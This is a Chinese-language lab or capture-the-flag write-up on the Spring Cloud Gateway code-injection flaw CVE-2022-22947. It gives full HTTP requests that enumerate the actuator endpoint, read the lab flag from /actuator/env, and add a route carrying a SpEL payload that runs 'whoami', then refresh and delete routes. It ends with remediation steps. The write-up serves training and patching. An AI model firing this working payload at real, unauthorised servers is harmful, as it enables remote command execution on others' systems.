靶标介绍:
Spring Cloud Gateway 远程代码执行漏洞(CVE-2022-22947)发生在Spring Cloud Gateway应用程序的Actuator端点,其在启用、公开和不安全的情况下容易受到代码注入的攻击。攻击者可通过该漏洞恶意创建允许在远程主机上执行任意远程执行的请求。
分析:
Spring Cloud Gateway 是JAVA框架的一个路由设置,使用低版本未进行安全策略设置就会存在此问题
影响版本:
0x04 影响版本:
3.1.x系列:Spring Cloud Gateway < 3.1.1
3.0.x系列:Spring Cloud Gateway < 3.0.7
其他旧的、不受支持的Spring Cloud Gateway版本
修改GET /actuator请求,确定actuator端口已经开启
GET /actuator/ HTTP/1.1
GET /actuator/ HTTP/1.1
Host: eci-2ze1790muyii7mcirpig.cloudeci1.ichunqiu.com:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 0
HTTP/1.1 200 OK
Date: Tue, 05 Dec 2023 03:02:31 GMT
Content-Type: application/vnd.spring-boot.actuator.v3+json
Content-Length: 2675
Connection: close
{"_links":{"self":{"href":"http://eci-2ze1790muyii7mcirpig.cloudeci1.ichunqiu.com/actuator","templated":false},"beans":{"href":"http://eci-2ze1790muyii7mcirpig.cloudeci1.ichunqiu.com/actuator/beans","templated":false},"caches-cache":{"href":"http://eci-2ze1790muyii7mcirpig.cloudeci1.ichunqiu.com/actuator/caches/{cache}","templated":true},"caches":{"href":"http://eci-2ze1790muyii7mcirpig.cloudeci1.ichunqiu.com/actuator/caches","templated":false},"health-path":{"href":"http://eci-2ze1790muyii7mcirpig.cloudeci1.ichunqiu.com/actuator/health/{*path}","templated":true},"health":{"href":"http://eci-2ze1790muyii7mcirpig.cloudeci1.ichunqiu.com/actuator/health","templated":false},"info":{"href":"http://eci-2ze1790muyii7mcirpig.cloudeci1.ichunqiu.com/actuator/info","templated":false},"conditions":{"href":"http://eci-2ze1790muyii7mcirpig.cloudeci1.ichunqiu.com/actuator/conditions","templated":false},"configprops-prefix":{"href":"http://eci-2ze1790muyii7mcirpig.cloudeci1.ichunqiu.com/actuator/configprops/{prefix}","templated":true},"configprops":{"href":"http://eci-2ze1790muyii7mcirpig.cloudeci1.ichunqiu.com/actuator/configprops","templated":false},"env-toMatch":{"href":"http://eci-2ze1790muyii7mcirpig.cloudeci1.ichunqiu.com/actuator/env/{toMatch}","templated":true},"env":{"href":"http://eci-2ze1790muyii7mcirpig.cloudeci1.ichunqiu.com/actuator/env","templated":false},"loggers-name":{"href":"http://eci-2ze1790muyii7mcirpig.cloudeci1.ichunqiu.com/actuator/loggers/{name}","templated":true},"loggers":{"href":"http://eci-2ze1790muyii7mcirpig.cloudeci1.ichunqiu.com/actuator/loggers","templated":false},"heapdump":{"href":"http://eci-2ze1790muyii7mcirpig.cloudeci1.ichunqiu.com/actuator/heapdump","templated":false},"threaddump":{"href":"http://eci-2ze1790muyii7mcirpig.cloudeci1.ichunqiu.com/actuator/threaddump","templated":false},"metrics":{"href":"http://eci-2ze1790muyii7mcirpig.cloudeci1.ichunqiu.com/actuator/metrics","templated":false},"metrics-requiredMetricName":{"href":"http://eci-2ze1790muyii7mcirpig.cloudeci1.ichunqiu.com/actuator/metrics/{requiredMetricName}","templated":true},"scheduledtasks":{"href":"http://eci-2ze1790muyii7mcirpig.cloudeci1.ichunqiu.com/actuator/scheduledtasks","templated":false},"mappings":{"href":"http://eci-2ze1790muyii7mcirpig.cloudeci1.ichunqiu.com/actuator/mappings","templated":false},"refresh":{"href":"http://eci-2ze1790muyii7mcirpig.cloudeci1.ichunqiu.com/actuator/refresh","templated":false},"features":{"href":"http://eci-2ze1790muyii7mcirpig.cloudeci1.ichunqiu.com/actuator/features","templated":false},"gateway":{"href":"http://eci-2ze1790muyii7mcirpig.cloudeci1.ichunqiu.com/actuator/gateway","templated":false}}}
响应一些地址信息
地址栏访问该条信息
http://eci-2ze1790muyii7mcirpig.cloudeci1.ichunqiu.com:8080/actuator/env
json串 JSON.propertySources[3].properties.ICQ_FLAG.value
可以查找flag "flag{998a1337-d197-4ed9-9c94-c9272fb1eb38}"
——————————————————结束——————————————
添加路由 POST /actuator/gateway/routes/test1234 HTTP/1.1
POST /actuator/gateway/routes/test1234 HTTP/1.1 Host: eci-2ze1790muyii7mcirpig.cloudeci1.ichunqiu.com:8080 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Connection: close Content-Type: application/json Content-Length: 337 { "id": "test1234", "filters": [{ "name": "AddResponseHeader", "args": { "name": "Result", "value": "#{new String(T(org.springframework.util.StreamUtils).copyToByteArray(T(java.lang.Runtime).getRuntime().exec(new String[]{\"whoami\"}).getInputStream()))}" } }], "uri": "http://example.com" }
刷新路由:POST /actuator/gateway/refresh HTTP/1.1
POST /actuator/gateway/refresh HTTP/1.1
查看路由 GET /actuator/gateway/routes/test1234 HTTP/1.1
GET /actuator/gateway/routes/test1234 HTTP/1.1 Host: eci-2ze1790muyii7mcirpig.cloudeci1.ichunqiu.com:8080 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 0
如何进行利用道行太浅 仅仅可以任意删除路由
curl -X DELETE http://eci-2ze1790muyii7mcirpig.cloudeci1.ichunqiu.com:8080/actuator/gateway/routes/test
整改措施:
如果不需要Gateway actuator endpoint,可通过 management.endpoint.gateway.enabled: false 禁用它。
升级版本
- Spring Cloud Gateway >= 3.1.1
- Spring Cloud Gateway >= 3.0.7